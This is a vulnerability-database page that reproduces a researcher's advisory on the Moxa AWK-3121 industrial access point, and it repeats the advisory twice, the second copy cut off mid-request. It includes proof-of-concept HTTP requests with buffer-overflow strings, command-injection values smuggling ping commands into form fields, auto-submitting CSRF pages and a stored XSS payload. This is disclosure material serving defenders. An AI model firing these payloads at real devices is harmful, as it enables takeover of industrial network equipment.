VARIoT IoT vulnerabilities database
| VAR-201906-0784 | CVE-2018-10694 | Moxa AWK-3121 Vulnerabilities related to certificate and password management in devices |
CVSS V2: 4.3 CVSS V3: 8.1 Severity: HIGH |
An issue was discovered on Moxa AWK-3121 1.14 devices. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well. The Moxa AWK-3121 device contains vulnerabilities related to certificate and password management. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. There is a cryptographic vulnerability in the Moxa AWK-3121 1.14 release. The vulnerability stems from the network system or product not using the relevant cryptographic algorithm correctly, resulting in content not being properly encrypted, being weakly encrypted, or sensitive information being stored in plaintext. A trust management issue vulnerability exists in Moxa AWK-3121 version 1.14. This vulnerability stems from the lack of an effective trust management mechanism in the network system or product. Attackers can use default passwords, hard-coded passwords, hard-coded certificates, etc. to attack affected components.
1.
The device by default allows HTTP traffic, thus providing an insecure
communication mechanism for a user connecting to the web server.
------------------------------------------
[VulnerabilityType Other]
HTTP traffic by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
2.
It is intended that an administrator can download /systemlog.log (the system
log). However, the same functionality allows an attacker to download
the file without any authentication or authorization.
------------------------------------------
[Additional Information]
POC
http://192.168.127.253//systemlog.log
------------------------------------------
[Vulnerability Type]
Incorrect Access Control
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can navigate to the URL and download the system log file without any authentication or authorization.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
3.
The session cookie "Password508" does not have an HttpOnly flag.
This allows an attacker who is able to execute a cross-site
scripting attack to steal the cookie very easily.
------------------------------------------
[VulnerabilityType Other]
Missing HttpOnly flag on session cookie
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can use a cross-site scripting attack to access the session cookie "Password508", which can allow the attacker to log in to the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
4.
The device provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly.
However, the same functionality allows an attacker to execute commands
on the device. The POST parameter "srvName" is susceptible to a buffer
overflow. By crafting a packet that contains a string of
516 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
5.
The device provides a Wi-Fi connection that is open and does not use
any encryption mechanism by default. An administrator who uses the
open wireless connection to set up the device can allow an
attacker to sniff the traffic passing between the user's computer and the
device. This can allow an attacker to steal the credentials passing
over the HTTP connection as well as TELNET traffic. Also an attacker
can MITM the response and infect a user's computer very easily as
well.
------------------------------------------
[VulnerabilityType Other]
Open WiFi Connection
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Device
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can monitor the Wi-Fi channels using Kismet or some other
open-source software and a wireless card in monitor mode, and sniff all
the traffic, including HTTP traffic as well as SSH and Telnet traffic.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
6.
The device provides alert functionality so that an
administrator can send emails to his/her account when there are
changes to the device's network. However, the same functionality allows
an attacker to execute commands on the device. The POST parameters
"to1", "to2", "to3" and "to4" are all susceptible to buffer overflow. By crafting
a packet that contains a string of 678 characters, it is
possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_SendTestEmail HTTP/1.1
Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and execute the buffer overflow.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
7.
The device provides a web interface to allow an administrator to
manage the device. However, this interface is not protected against
CSRF attacks, which allows an attacker to trick an administrator into
executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and
forms/webSetMainRestart URIs.
------------------------------------------
[Additional Information]
POC to change name of the device
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" />
<input type="hidden" name="iw_board_deviceLocation" value="" />
<input type="hidden" name="iw_board_deviceDescription" value="" />
<input type="hidden" name="iw_board_deviceContactInfo" value="" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="bkpath" value="/sysinfo.asp " />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="SaveValue" value="1" />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
------------------------------------------
[Vulnerability Type]
Cross Site Request Forgery (CSRF)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can trick an administrator of the device into visiting an
attacker-controlled page while connected to the network, and thus into
changing the password or any other setting.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
8.
The Moxa AWK 3121 provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly.
However, the same functionality allows an attacker to execute commands
on the device. The POST parameter "srvName" is susceptible to command
injection. By crafting a packet that contains shell metacharacters,
it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[VulnerabilityType Other]
Command injection in Ping functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
9.
The device enables an unencrypted TELNET service by default.
------------------------------------------
[VulnerabilityType Other]
Insecure service Telnet enabled by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Telnet daemon
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
10.
The Moxa AWK 3121 provides certificate file upload functionality so that an
administrator can upload a certificate file used for connecting to the
wireless network. However, the same functionality allows an attacker
to execute commands on the device. The POST parameter "iw_privatePass"
is susceptible to command injection. By crafting a packet that contains
shell metacharacters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_certUpload HTTP/1.1
Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962
Content-Disposition: form-data; name="iw_privatePass"
;`ping -c 9 192.168.127.103` ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1
... 114782935826962
Content-Disposition: form-data; name="certSection"
certWlan
... 114782935826962
Content-Disposition: form-data; name="rfindex"
0
... 114782935826962
Content-Disposition: form-data; name="Submit"
Submit
... 114782935826962
Content-Disposition: form-data; name="certFile1"
test.txt
... 114782935826962
Content-Disposition: form-data; name="certFile"; filename="blob"
Content-Type: text/xml
<a id="a"><b id="b">hey!</b></a>
... 114782935826962--
------------------------------------------
[VulnerabilityType Other]
Command injection in file upload
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
11.
The device provides functionality so that an administrator can change the
name of the device. However, the same functionality allows an attacker
to execute XSS by injecting an XSS payload. The POST parameter
"iw_board_deviceName" is susceptible to this injection.
------------------------------------------
[Additional Information]
POC
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" />
<input type="hidden" name="iw_board_deviceLocation" value="" />
<input type="hidden" name="iw_board_deviceDescription" value="" />
<input type="hidden" name="iw_board_deviceContactInfo" value="" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="bkpath" value="/sysinfo.asp " />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
------------------------------------------
[Vulnerability Type]
Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.9
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
12.
The device provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_filename" is susceptible to buffer
overflow. By crafting a packet that contains a string of
162 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
`ping -c 3 192.168.127.101`
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and execute the buffer overflow.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
13.
The device provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_filename" is susceptible to command
injection via shell metacharacters.
------------------------------------------
[Additional Information]
POC
<html>
<body>
<script>
function submitRequest()
{
var formData = new FormData();
formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user
formData.append("certFile1", "test.txt");
// JavaScript file-like object
var content = '<a id="a"><b id="b">hey!</b></a>'; // the body of the new file...
var blob = new Blob([content], { type: "text/xml"});
formData.append("certFile", blob);
var request = new XMLHttpRequest();
request.open("POST", "http://192.168.127.253/forms/web_certUpload");
request.send(formData);
}
</script>
<form action="#">
<input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
------------------------------------------
[VulnerabilityType Other]
Command injection in web runscript functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
14.
The device provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_serverip" is susceptible to buffer
overflow. By crafting a packet that contains a string of
480 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="XXXX"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
AAAAAAAAAAAAAAAAAA (etc.)
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and execute the buffer overflow.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
| VAR-201906-0782 | CVE-2018-10692 | Moxa AWK-3121 Device cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
An issue was discovered on Moxa AWK-3121 1.14 devices. The session cookie "Password508" does not have an HttpOnly flag. This allows an attacker who is able to execute a cross-site scripting attack to steal the cookie very easily. The Moxa AWK-3121 device contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The vulnerability stems from the lack of correct validation of client data in the web application. An attacker could exploit this vulnerability to execute client-side code.
The device by default allows HTTP traffic thus
providing an insecure communication mechanism for a user connecting to
the web server.
------------------------------------------
[VulnerabilityType Other]
HTTP traffic by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
2.
It is intended that an administrator can download /systemlog.log (the system
log). However, the same functionality allows an attacker to download
the file without any authentication or authorization.
------------------------------------------
[Additional Information]
POC
http://192.168.127.253//systemlog.log
------------------------------------------
[Vulnerability Type]
Incorrect Access Control
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can navigate to URL and download the systemlog file without any authentication or authorization
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
3.
------------------------------------------
[VulnerabilityType Other]
Missing HttpOnly flag on session cookie
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
4.
It provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to a buffer
overflow.
------------------------------------------
[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
5.
The device provides a Wi-Fi connection that is open and does not use
any encryption mechanism by default. An administrator who uses the
open wireless connection to set up the device can allow an
attacker to sniff the traffic passing between the user's computer and the
device. This can allow an attacker to steal the credentials passing
over the HTTP connection as well as TELNET traffic. Also an attacker
can MITM the response and infect a user's computer very easily as
well.
------------------------------------------
[VulnerabilityType Other]
Open WiFi Connection
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Device
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can monitor the Wifi channels using Kismet or some other
opensource software and an wireless card in monitor mode and sniff all
the traffic including HTTP traffic as well as SSH and Telnet traffic.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
6.
It provides alert functionality so that an
administrator can send emails to his/her account when there are
changes to the device's network. The POST parameters
"to1,to2,to3,to4" are all susceptible to buffer overflow.
------------------------------------------
[Additional Information]
POC
POST /forms/web_SendTestEmail HTTP/1.1
Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
7.
The device provides a web interface to allow an administrator to
manage the device. However, this interface is not protected against
CSRF attacks, which allows an attacker to trick an administrator into
executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and
forms/webSetMainRestart URIs.
------------------------------------------
[Additional Information]
POC to change name of the device
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" />
<input type="hidden" name="iw_board_deviceLocation" value="" />
<input type="hidden" name="iw_board_deviceDescription" value="" />
<input type="hidden" name="iw_board_deviceContactInfo" value="" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="bkpath" value="/sysinfo.asp " />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="SaveValue" value="1" />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
------------------------------------------
[Vulnerability Type]
Cross Site Request Forgery (CSRF)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can trick an administrator of the device into visiting an
attacker-controlled page while connected to the network, and thereby
change the password or any other setting
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
8.
The Moxa AWK 3121 provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to command
injection.
------------------------------------------
[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[VulnerabilityType Other]
Command injection in Ping functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
9.
The device enables an unencrypted TELNET service by default. Also an attacker can easily
connect to the TELNET daemon using the default credentials if they have
not been changed by the user.
------------------------------------------
[VulnerabilityType Other]
Insecure service Telnet enabled by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Telnet daemon
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the traffic passing between the device and the user by using a MITM attack such as ARP poisoning
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
10.
The Moxa AWK 3121 provides certfile upload functionality so that an
administrator can upload a certificate file used for connecting to the
wireless network. The POST parameter "iw_privatePass"
is susceptible to command injection.
------------------------------------------
[Additional Information]
POC
POST /forms/web_certUpload HTTP/1.1
Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962
Content-Disposition: form-data; name="iw_privatePass"
;`ping -c 9 192.168.127.103` ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1
... 114782935826962
Content-Disposition: form-data; name="certSection"
certWlan
... 114782935826962
Content-Disposition: form-data; name="rfindex"
0
... 114782935826962
Content-Disposition: form-data; name="Submit"
Submit
... 114782935826962
Content-Disposition: form-data; name="certFile1"
test.txt
... 114782935826962
Content-Disposition: form-data; name="certFile"; filename="blob"
Content-Type: text/xml
<a id="a"><b id="b">hey!</b></a>
... 114782935826962--
------------------------------------------
[VulnerabilityType Other]
Command injection in file upload
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
11. The device
provides functionality so that an administrator can change the
name of the device. The POST parameter
"iw_board_deviceName" is susceptible to cross-site scripting (XSS) injection.
------------------------------------------
[Additional Information]
POC
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" />
<input type="hidden" name="iw_board_deviceLocation" value="" />
<input type="hidden" name="iw_board_deviceDescription" value="" />
<input type="hidden" name="iw_board_deviceContactInfo" value="" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="bkpath" value="/sysinfo.asp " />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
------------------------------------------
[Vulnerability Type]
Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.9
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
12.
The device provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. The POST parameter "iw_filename" is susceptible to a buffer
overflow.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
`ping -c 3 192.168.127.101`
